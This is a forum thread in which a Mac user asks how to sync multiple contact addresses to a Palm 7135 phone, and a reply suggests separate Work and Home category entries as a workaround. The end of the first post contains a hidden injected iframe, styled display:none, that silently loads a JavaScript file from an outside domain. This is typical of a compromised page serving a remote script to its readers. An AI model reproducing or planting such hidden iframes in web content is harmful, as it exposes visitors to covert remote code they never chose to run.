+ Reply to Thread

Mac Sync w/ bulit In Address Book or Alternative

I have used a Palm Pilot for many years and have always been disapointed with the Syncing ability of the Palm and other Address book programs aside from the Palm Desktop for Mac. My issues is simple, If you don't use Palm's Desktop program, and you have multiple address' in say Apple's Address Book program or MS Entourage, once you sync the Palm and the Desktop address book program, all you get is the main address (usually the Home) in your Palm pilot. I was wondering with any other Mac users out there using the new 7135 or for that matter any Palm pilot, have you been able to figure out a way to be able to sync Business and home address for your contact into the Palm from any other program other than the Palm Desktop ?

Also is there any other Address book that you use that is better than the built in 7135 Address book (it is very limiting!!) but still works with the phone functions ?

Any help would greatly be appreciated!

By the way, I was reserved on buying this phone from GetConnected but I broke down and bought it and have been a VERY happy User!! (Except for this Address book thing :alieneyes ) Also When I activated it through Verizon, I spoke to a supervisor and he had no problems taking care of the activation and I asked him about the warranty and he said no problem, the warranty is based on the ESN that is active on that line and he said since Verizon is going to carry the phone, to cover mine under this is not a problem.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Use catagories

The limitation is in the Palm database. No address book app will give you what you are looking for. You can get around the problem by making two entries for people you have more than one adddress and apply Work catagory to their work information entry and Home catagory to their home information. You can then use the catgory view in the address application to make you search easier and faster.

Not an ideal solution, but the only one that I have found. I use Organizer as my desktop PIM. It works very well, syncs well and has a lot of features, but I have to be careful not to use more of the features than the Palm OS can handle.